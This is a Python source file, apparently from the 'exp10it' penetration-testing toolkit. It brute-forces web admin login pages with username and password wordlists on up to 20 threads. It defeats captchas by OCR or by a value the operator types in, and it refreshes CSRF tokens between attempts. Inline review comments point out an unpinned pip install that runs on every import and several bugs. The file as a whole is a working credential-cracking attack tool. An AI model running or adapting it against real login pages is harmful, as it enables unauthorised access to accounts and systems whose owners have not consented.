import time
from exp10it import figlet2file
# Banner drawn as a side effect of importing this module, followed by a
# one-second pause.
figlet2file("3xp10it",0,True)
time.sleep(1)
import os
import re
import sys
from concurrent import futures
# NOTE(review): this shells out to ``pip3 install exp10it -U`` on every
# import of the module: it needs network access, installs whatever version
# the package index currently serves (no pin, no hash), and does so with the
# privileges of whoever imports this file -- a supply-chain exposure for the
# operator's own machine. It also cannot rescue the ``from exp10it import``
# on the second line above, which has already run (and would already have
# failed) by the time this executes; only the imports below see the upgrade.
os.system("pip3 install exp10it -U --no-cache")
from exp10it import CLIOutput
from exp10it import get_request
from exp10it import get_value_from_url
from exp10it import get_user_and_pass_form_from_html
from exp10it import get_yanzhengma_form_and_src_from_url
from exp10it import get_string_from_url_or_picfile
from exp10it import ModulePath
from exp10it import get_remain_time
from exp10it import get_http_domain_from_url
from exp10it import get_url_has_csrf_token
from exp10it import get_param_part_from_content
def get_csrf_token_value_from_html(html):
    """Return the value of the first ``*token*`` parameter found in *html*.

    HTML comments are stripped first. The pattern is not compiled with
    DOTALL and is greedy, so only same-line ``<!-- ... -->`` spans are
    removed, and a line holding several comments loses everything between
    its first ``<!--`` and its last ``-->``. The parameter string produced
    by ``get_param_part_from_content`` is then scanned case-insensitively
    for a ``name=value`` pair whose name contains ``token``.

    Returns ``""`` when no such pair exists.
    """
    stripped = re.sub(r"<!--.*-->", "", html)
    params = get_param_part_from_content(stripped)
    match = re.search(r"([^&?]*token[^=]*)=([^&]+)", params, re.I)
    return match.group(2) if match else ""
def crack_admin_login_url(
        url,
        user_dict_file=ModulePath + "dicts/user.txt",
        pass_dict_file=ModulePath + "dicts/pass.txt",
        yanzhengma_len=0):
    """Try every user/password pair from the two wordlists against the login form at *url*.

    The page is fetched once through ``get_request(by="selenium_phantom_jS")``
    and the form fields are located with ``get_user_and_pass_form_from_html``;
    captcha ("yanzhengma") and CSRF-token fields are detected with the exp10it
    helpers and filled in on every request. Success is decided purely by
    response size: a reply longer than 1.5x the unauthenticated page is
    taken as "logged in" (see ``logined_least_length`` below), so any large
    error or lockout page would be reported as a hit too.

    Args:
        url: login page to test.
        user_dict_file: path of the username wordlist, one entry per line.
        pass_dict_file: path of the password wordlist, one entry per line;
            prompted for interactively when it does not exist.
        yanzhengma_len: expected captcha length; 0 disables the length
            filter applied to OCR results.

    Returns:
        The success message string, or ``""`` when no pair matched.
        Returns ``None`` early when no username/password form or no form
        action is found on the page.
    """
    # yanzhengma_len is the required captcha length; by default it is not set
    # and is obtained automatically -- setting it by hand per target works better.
    # Brute-force the admin login url and try to recognise the captcha
    # automatically; if the login page has no captcha, sending arbitrary
    # captcha data still passes.
    import requests
    figlet2file("cracking admin login url", 0, True)
    print("cracking admin login url:%s" % url)
    print("正在使用吃奶的劲爆破登录页面...")

    # The shared state further down (get_flag, try_time, sum, start, ...) is
    # kept in one-element lists so the nested functions can rebind it without
    # ``nonlocal``; note that ``sum`` shadows the builtin inside this function.
    def crack_admin_login_url_thread(url,username,password):
        """Send a single login attempt for (username, password); runs in a worker thread."""
        # Workers that start after a hit return at once; nothing stops the
        # ones already running (see the terminate() note further down).
        if get_flag[0] == 1:
            return
        # NOTE(review): plain ``+=`` on shared state from up to 20 threads
        # (max_workers below) -- this counter is approximate, not exact.
        try_time[0] += 1
        if request_action=="GET":
            # Rewrite the query string of the form action in place: user,
            # password, captcha and CSRF parameters are substituted by regex
            # on ``name=value``; the values are inserted without URL-encoding.
            final_request_url=form_action_url
            final_request_url=re.sub(r"%s=[^&]*" % user_form_name,"%s=%s" %
                (user_form_name,username),final_request_url)
            final_request_url=re.sub(r"%s=[^&]*" % pass_form_name,"%s=%s" %
                (pass_form_name,password),final_request_url)
            if has_yanzhengma[0]:
                if need_only_get_one_yan_zheng_ma:
                    yanzhengma_value=only_one_yan_zheng_ma_value
                else:
                    yanzhengma_value=get_one_valid_yangzhengma_from_src(yanzhengma_src)
                final_request_url=re.sub(r"%s=[^&]*" % yanzhengma_form_name,"%s=%s" %
                    (yanzhengma_form_name,yanzhengma_value),final_request_url)
            if has_csrf_token:
                # current_csrf_token_part[0] already holds "name=value".
                final_request_url=re.sub(r"%s=[^&]*" % csrf_token_name,current_csrf_token_part[0],final_request_url)
            html=s.get(final_request_url).text
            if has_csrf_token:
                # Refresh the token from the reply for the next attempt
                # (CSRF targets run single-threaded, see max_workers below).
                csrf_token_value=get_csrf_token_value_from_html(html)
                current_csrf_token_part[0]=csrf_token_part+csrf_token_value
        else:
            #post request
            # The form action value is "<post url>^<param string>"; the
            # parameter string is split into a dict and the user/password
            # entries overwritten. A parameter without "=" raises IndexError.
            param_part_value=form_action_url.split("^")[1]
            param_list=param_part_value.split("&")
            values={}
            for eachP in param_list:
                each_p_list=eachP.split("=")
                eachparam_name=each_p_list[0]
                eachparam_value=each_p_list[1]
                if eachparam_name==user_form_name:
                    eachparam_value=username
                if eachparam_name==pass_form_name:
                    eachparam_value=password
                values[eachparam_name]=eachparam_value
            if has_yanzhengma[0]:
                if not need_only_get_one_yan_zheng_ma:
                    values[yanzhengma_form_name]=get_one_valid_yangzhengma_from_src(yanzhengma_src)
                else:
                    values[yanzhengma_form_name]=only_one_yan_zheng_ma_value
            if has_csrf_token:
                # Strip the "name=" prefix stored in current_csrf_token_part.
                values[csrf_token_name]=re.search(r"[^=]+=(.*)",current_csrf_token_part[0]).group(1)
            html = s.post(form_action_url.split("^")[0], values).text
            if has_csrf_token:
                csrf_token_value=get_csrf_token_value_from_html(html)
                current_csrf_token_part[0]=csrf_token_part+csrf_token_value
        # Fixed-width label for the progress line; padding goes negative
        # (i.e. none) for passwords longer than 52 characters.
        USERNAME_PASSWORD = "(" + username + ":" + \
            password + ")" + (52 - len(password)) * " "
        # Every 100 tries the average speed of the finished work is computed.
        # biaoji_time is never updated anywhere in this file -- presumably
        # get_remain_time treats it as a marker it maintains; verify.
        left_time = get_remain_time(
            start[0],
            biaoji_time[0],
            remain_time[0],
            100,
            try_time[0],
            sum[0])
        remain_time[0] = left_time
        sys.stdout.write('-' * (try_time[0] * 100 // sum[0]) + '>' + str(try_time[0] * 100 // sum[0]) +
                         '%' + ' %s/%s remain time:%s %s\r' % (try_time[0], sum[0], remain_time[0], USERNAME_PASSWORD))
        sys.stdout.flush()
        if len(html) > logined_least_length:
            # Treated as a successful login (size heuristic only, see docstring).
            get_flag[0] = 1
            end = time.time()
            CLIOutput().good_print(
                "congratulations!!! admin login url cracked succeed!!!", "red")
            string = "cracked admin login url:%s username and password:(%s:%s)" % (
                url, username, password)
            CLIOutput().good_print(string, "red")
            return_string[0]=string
            print("you spend time:" + str(end - start[0]))
            http_domain_value = get_http_domain_from_url(url)
            # Verified: terminate() only ends the current thread, it cannot
            # end all of them -- hence the get_flag check at the top.
            # NOTE(review): get_target_table_name_list is neither imported nor
            # defined in this file, so this line raises NameError on the
            # success path. The exception is swallowed because the result of
            # executor.map is never consumed; return_string was already set
            # above, so the caller still gets the message. The two names
            # computed here are never used -- presumably a leftover of a
            # database-recording step.
            table_name_list = get_target_table_name_list(http_domain_value)
            urls_table_name = http_domain_value.split(
                "/")[-1].replace(".", "_") + "_urls"
            return {'username': username, 'password': password}

    def crack_admin_login_url_inside_func(url, username, pass_dict_file):
        """Run every password in *pass_dict_file* against one *username* on a thread pool."""
        # urls and usernames are lists of the same repeated value, built to
        # the length of the password list so executor.map can zip them.
        urls = []
        usernames = []
        # passwords is the list of every password in pass_dict_file.
        passwords = []
        i = 0
        # Prompt for a wordlist path until an existing file is given. The
        # path typed here rebinds only this call's parameter, and the caller
        # passes its own pass_dict_file on every username, so the prompt
        # recurs once per username when the default file is missing.
        while 1:
            if os.path.exists(pass_dict_file) is False:
                print("please input your password dict:>", end=' ')
                pass_dict_file = input()
                if os.path.exists(pass_dict_file) is True:
                    break
            else:
                break
        # Opened read-write although it is only read; trailing whitespace
        # (including the newline) is trimmed from each entry.
        f = open(pass_dict_file, "r+")
        for each in f:
            urls.append(url)
            usernames.append(username)
            each = re.sub(r"(\s)$", "", each)
            passwords.append(each)
            i += 1
        f.close()
        # Total attempts for the progress line; reset on every username.
        sum[0] = usernames_num * i
        # Single-threaded when a captcha was entered by hand or a CSRF token
        # must be chained from reply to reply; otherwise 20 workers, which
        # then all share the fixed 'img.png' path used for per-request OCR.
        if need_only_get_one_yan_zheng_ma or has_csrf_token:
            max_workers=1
        else:
            max_workers=20
        with futures.ThreadPoolExecutor(max_workers=max_workers) as executor:
            # Results (and any exception raised in a worker) are discarded.
            executor.map(crack_admin_login_url_thread, urls, usernames, passwords)

    def get_one_valid_yangzhengma_from_src(yanzhengma_url):
        """Fetch the captcha image through the shared session and OCR it until the text looks plausible."""
        # exp10it's packaged get_request/post_request are not used here because
        # the session has to be preserved -- the server needs it.
        #yanzhengma = get_string_from_url_or_picfile(yanzhengma_src)
        while 1:
            import shutil
            response = s.get(yanzhengma_url, stream=True)
            # Written to a fixed name in the current directory; see the
            # max_workers note above on concurrent writers.
            with open('img.png', 'wb') as out_file:
                shutil.copyfileobj(response.raw, out_file)
            del response
            yanzhengma = get_string_from_url_or_picfile("img.png")
            # Shell round-trip for a literal path; os.remove would do the same.
            os.system("rm img.png")
            # Fixed pause between captcha fetches.
            time.sleep(3)
            # Reject OCR output that is not purely alphanumeric, contains
            # whitespace, is empty, or has the wrong length when one is set.
            if re.search(r"[^a-zA-Z0-9]+", yanzhengma):
                # time.sleep(3)
                continue
            elif re.search(r"\s", yanzhengma):
                continue
            elif yanzhengma == "":
                continue
            else:
                if yanzhengma_len != 0:
                    if len(yanzhengma) != yanzhengma_len:
                        continue
                # print(yanzhengma)
                # print(len(yanzhengma))
                break
        return yanzhengma

    # Rendered fetch of the login page and form discovery.
    a=get_request(url,by="selenium_phantom_jS")
    get_result = get_user_and_pass_form_from_html(a['content'])
    user_form_name = get_result['user_form_name']
    pass_form_name = get_result['pass_form_name']
    if user_form_name is None:
        print("user_form_name is None")
        return
    if pass_form_name is None:
        print("pass_form_name is None")
        return
    form_action_url = a['form_action_value']
    #default request action=post
    # A "^" in the form action value marks "<post url>^<params>"; without
    # it the action is treated as a GET url with the parameters inline.
    request_action="POST"
    if a['has_form_action']:
        if "^" not in a['form_action_value']:
            request_action="GET"
    else:
        print("url is not a admin login url entry")
        return
    # Mutable cells shared with the nested functions (see note above).
    get_flag = [0]
    return_string=[""]
    try_time = [0]
    sum = [0]
    start = [0]
    # "Function-global" marker of the current time.
    biaoji_time = [0]
    # "Function-global" marker of the remaining completion time.
    tmp = time.time()
    remain_time = [tmp - tmp]
    # current_username_password={}
    has_yanzhengma = [False]
    find_yanzhengma = get_yanzhengma_form_and_src_from_url(url)
    if find_yanzhengma:
        yanzhengma_form_name = find_yanzhengma['yanzhengma_form_name']
        yanzhengma_src = find_yanzhengma['yanzhengma_src']
        has_yanzhengma = [True]
    has_csrf_token=False
    for_csrf_token=get_url_has_csrf_token(url)
    if for_csrf_token['has_csrf_token']:
        has_csrf_token=True
        csrf_token_name=for_csrf_token['csrf_token_name']
        csrf_token_part=csrf_token_name+"="
        current_csrf_token_part=[""]
    # One requests session carries cookies across every attempt.
    s = requests.session()
    # sesssion start place
    session_start=s.get(url)
    unlogin_length = len(session_start.text)
    # If the reply after posting is longer than the not-logged-in page by
    # more than half its length, the login is considered successful.
    logined_least_length = unlogin_length + unlogin_length / 2
    if has_csrf_token:
        csrf_token_value=get_csrf_token_value_from_html(session_start.text)
        current_csrf_token_part=[csrf_token_part+csrf_token_value]
    # Decide whether one hand-entered captcha is reused for every attempt or
    # a fresh one is fetched per request. 'y1' is a component returned by
    # get_value_from_url -- presumably a URL part compared between the form
    # action and the page itself; confirm against exp10it.
    need_only_get_one_yan_zheng_ma=False
    if has_yanzhengma[0]:
        if "^" in form_action_url:
            #post request
            print(get_value_from_url(form_action_url.split("^")[0])['y1'])
            if get_value_from_url(form_action_url.split("^")[0])['y1']!=get_value_from_url(a['current_url'])['y1']:
                # should update yanzhengma everytime
                need_only_get_one_yan_zheng_ma=True
        else:
            #get request
            if get_value_from_url(form_action_url)['y1']!=get_value_from_url(a['current_url'])['y1']:
                need_only_get_one_yan_zheng_ma=True
        if need_only_get_one_yan_zheng_ma:
            print("Congratulation! Target login url need only one yanzhengma!!")
            import shutil
            response = s.get(yanzhengma_src, stream=True)
            with open('img.png', 'wb') as out_file:
                shutil.copyfileobj(response.raw, out_file)
            del response
            # The single captcha value is typed in by the operator.
            only_one_yan_zheng_ma_value= input("Please open img.png and input the yanzhengma string:>")
            #get_string_from_url_or_picfile("img.png")
            os.system("rm img.png")
    # Username list; opened read-write although only read.
    with open(r"%s" % user_dict_file, "r+") as user_file:
        all_users = user_file.readlines()
    usernames_num = len(all_users)
    start[0] = time.time()
    for username in all_users:
        # Two levels of multithreading were tried once and did not get through
        # all combinations, so no extra threads are started at this level.
        username = re.sub(r'(\s)$', '', username)
        crack_admin_login_url_inside_func(a['current_url'], username, pass_dict_file)
    return return_string[0]
if __name__ == '__main__':
    # ``sys`` is already imported at module level; the single positional
    # argument is the login page to test.
    url = sys.argv[1]
    # The second parameter pins the captcha length when it is known (the
    # original author's http://localhost/admin.php example used 4); it is
    # left out, as here, when the length is uncertain:
    #   crack_admin_login_url(url, yanzhengma_len=4)
    crack_admin_login_url(url)